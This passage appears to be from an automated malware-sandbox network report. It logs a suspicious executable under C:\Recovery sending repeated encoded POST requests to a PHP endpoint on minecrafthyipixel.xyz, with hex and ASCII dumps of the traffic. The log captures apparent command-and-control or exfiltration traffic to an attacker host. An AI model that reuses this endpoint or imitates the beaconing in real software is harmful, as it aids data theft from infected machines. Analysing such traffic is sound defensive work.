                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Yf9DonMeDS5S%2BhSzvB85M%2FqQr1gj%2FD%2BlWPCwIqunkd0%2F1fOA6VZhKRAcyZDzECENBE6vvUo1s3nv5OSKH6Y3i7V0wirb9gLCuq8KBDLhRhUggOHrkbtXhHgc3o5PVp5Gzq3U9%2BwJjI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2403beeb077-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:53.784292936 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    31192.168.2.449779104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:54.019906044 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:54.124525070 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:54.124825001 CEST2512OUTData Raw: 57 55 5b 5c 59 42 54 5e 5c 5e 59 59 57 53 58 5f 54 54 5f 56 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[\YBT^\^YYWSX_TT_VTXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&X.T5;(\3#']%+%U?8;X&:?2V42=? ??-5$[. X 5
                                                                                                                                    Apr 19, 2024 13:42:54.481956005 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:54 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nyo0DokNiAonGRrkdwPcebbaZVC0IoqqWtCW8HPMZ9iCuf54Dhak6OS4FAHInAbZKrNP2YfRbAXKDGeXmMdmP4%2B%2Bc2TxFX7eBrg2t6yawppmqiGalo4afqN%2BY1Pbda3M9CRj4LyxEiE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca243f980adcc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:54.482053041 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    32192.168.2.449780104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:54.723964930 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:54.828694105 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:54.828883886 CEST2512OUTData Raw: 52 58 5b 59 59 45 54 55 5c 5e 59 59 57 56 58 58 54 53 5f 58 54 55 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[YYETU\^YYWVXXTS_XTUS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>>W"'#?3]-?;;X':?1+2R#"= 4<,[/%$[. X !
                                                                                                                                    Apr 19, 2024 13:42:55.181181908 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:55 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9pCoXSfeTYnl6uN3gGrHlYxYJ27ilc5z0G50VQvsW3fP8RVmZ9Eag7hwIqyBRBaN6ovK%2BL9ngFvrCHhexYR69S6baGgIwrWlYNnZlAc3oq9gWK7SO8NNbOoDtKeDRNYzoGeQ3sfUyY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2485f8b8bb9-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:55.181247950 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    33192.168.2.449781104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:55.409945965 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:55.514437914 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:55.514724970 CEST2512OUTData Raw: 57 5a 5e 58 5c 41 54 5d 5c 5e 59 59 57 51 58 53 54 57 5f 5a 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^X\AT]\^YYWQXSTW_ZT[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1"V6;?$37Z0)+Y&9S18>7T6Q=;#.%$[. X =
                                                                                                                                    Apr 19, 2024 13:42:55.864952087 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:55 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTn3zTZRRBz5J2ab2lGFto4oGNGuVyY1JLdg1m3icR4NzNCjsOd3WIXQtZ994RMZ5kv7uGWAHdc%2Fp79ks3EMwK7c6nVgVLJTf3RBo2u5Bfh%2FrqW%2FFPX8KW6bOqpAnbjCWqtq1XGgDBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca24ca89cade3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:55.865014076 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    34192.168.2.449782104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:56.092020035 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:56.196677923 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:56.199951887 CEST2512OUTData Raw: 57 5c 5e 5c 59 4b 51 5a 5c 5e 59 59 57 5e 58 58 54 52 5f 5a 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^\YKQZ\^YYW^XXTR_ZTUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2>>6/' $]!U*82*8W1+%42.V*8<"/?-$[. X
                                                                                                                                    Apr 19, 2024 13:42:56.455543995 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:56 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYLoXW6ROZ4S%2BxFDw6StggaPOn6D2%2F8sXtdsMrptau%2BGzLd0EU5RHB3jdn5vqTf6NYS1G3PTO%2Bz1MOhlD2%2Fu1YM9gBenyVGaVn%2BruswWKf5Umzpboes12ht60JzKKRinsxWql6s%2FqWI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca250ee7bad80-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:56.455605984 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    35192.168.2.449783104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:56.686832905 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:56.791609049 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:56.791755915 CEST2512OUTData Raw: 52 58 5e 5e 5c 40 54 59 5c 5e 59 59 57 52 58 5f 54 56 5f 56 54 5b 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^^\@TY\^YYWRX_TV_VT[S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>W5( \3 00(.=82?2;"P#T2V=\#?.$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:57.060425997 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUS43S1Rgf8MzCt7gLqlrqkN%2F5bprBcJ0GhX0J4pUpMVbDkqNnPCYkAjVK0AWcfkbFZDSlbsBlAihwMiTZRY7QaC950bhN5lkNvfuZHbVWZtC7wmaOn8Ooz8hRylMnHKBhPHU%2BQsxPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca254abdbb085-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:57.060487032 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    36192.168.2.449784104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:57.278765917 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:57.383658886 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:57.383833885 CEST2504OUTData Raw: 52 5e 5b 59 59 44 51 58 5c 5e 59 59 57 57 58 53 54 52 5f 5f 54 5b 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[YYDQX\^YYWWXSTR__T[S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^%="V5;Z00'8!W>?X&8T&S#5>< /,^.5$[. X


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    37192.168.2.449785104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:57.662305117 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:57.766886950 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:57.767132998 CEST2172OUTData Raw: 57 5a 5e 5d 59 4a 51 5d 5c 5e 59 59 57 51 58 52 54 5a 5f 5e 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YJQ]\^YYWQXRTZ_^T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%>.R5((3<$]=*8?%28>7T.P);[4Z$Z.5$[. X =
                                                                                                                                    Apr 19, 2024 13:42:58.037465096 CEST766INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uns1aaQf4pAYpTCScLRFE2kpL2NLeWxz9ByC7NLAxyYHkksvAkWmcq3jCw6%2BF3odbmpAgW6tQBffS9gX03636ahOdkGdDAVVIcAvnyJ4cpPNtxZB17O2AOE%2BTifX1RT33j5EBKFEE8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25ab97a53b5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 58 27 26 3e 58 21 5c 30 02 29 1d 3e 12 3d 0e 36 05 3e 17 32 02 22 3d 23 0d 2c 04 0e 5b 3f 2b 00 17 32 0a 31 1a 27 03 37 0e 27 30 21 59 00 1a 39 58 23 3c 2e 00 39 39 04 03 2b 1f 25 10 20 0c 28 03 3f 07 3d 19 20 28 33 5d 3f 2e 25 56 2f 38 24 50 29 28 08 05 2d 37 25 04 21 3b 2c 52 09 12 26 0d 2b 38 28 58 32 0e 00 0d 20 31 20 58 3f 3f 26 5d 24 3b 2f 0f 31 0d 2b 05 2e 0c 3a 1d 25 07 35 10 28 3a 24 1e 23 3c 0b 19 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$X'&>X!\0)>=6>2"=#,[?+21'7'0!Y9X#<.99+% (?= (3]?.%V/8$P)(-7%!;,R&+8(X2 1 X??&]$;/1+.:%5(:$#<&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:58.037525892 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    38192.168.2.449786104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:57.825751066 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:57.930658102 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:57.931044102 CEST2512OUTData Raw: 57 5e 5e 5a 59 41 51 5a 5c 5e 59 59 57 56 58 5a 54 50 5f 5b 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^ZYAQZ\^YYWVXZTP_[TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%5$$'))'\%?$86 !1)]77? ]-5$[. X !
                                                                                                                                    Apr 19, 2024 13:42:58.187665939 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVkmrIItz7Bv9%2BY2ALC%2F%2BxhU1ms%2F6jN%2BsfrqqBPbyjKYqmUCrkdui2NLv4JUbbQQjRJBqLeSuprgFvv0tbm7rxNNwrD7HoDWgJa6VJZReBfmJJAZctuL03L3hKkAz8c9ozBihWEad4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25bbf934502-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:58.187731028 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    39192.168.2.449787104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:58.406861067 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:58.512396097 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:58.512777090 CEST2512OUTData Raw: 57 5a 5b 5b 59 4b 54 55 5c 5e 59 59 57 5e 58 5b 54 51 5f 5c 54 55 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[[YKTU\^YYW^X[TQ_\TUS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'="W ;07^'1U)^?2*<V%72)(#_4<#-%$[. X
                                                                                                                                    Apr 19, 2024 13:42:58.777456045 CEST631INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCwX%2B%2FGUqdzKeeKCDrnk%2BypY%2BuJ6f%2B57AkXcQ0Mm%2FfGLsAorvWxmqVXAi5lQXCimAqfBXe%2Brpg59rNlcOOfssSaN5u%2F1HvK5df6rJWMUsxBtZlgjnEPXfG57fA5qc0UKyqYSEKg1%2BJs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25f6c59ade1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
